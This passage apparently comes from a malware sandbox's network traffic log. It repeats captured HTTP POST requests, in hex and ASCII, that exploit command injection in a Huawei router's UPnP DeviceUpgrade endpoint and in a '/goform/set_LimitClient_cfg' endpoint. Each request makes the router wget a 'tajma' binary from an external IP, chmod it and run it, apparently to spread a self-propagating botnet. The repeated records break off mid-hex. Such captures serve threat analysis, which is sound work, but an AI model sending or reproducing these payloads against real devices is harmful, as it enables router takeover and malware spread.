70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 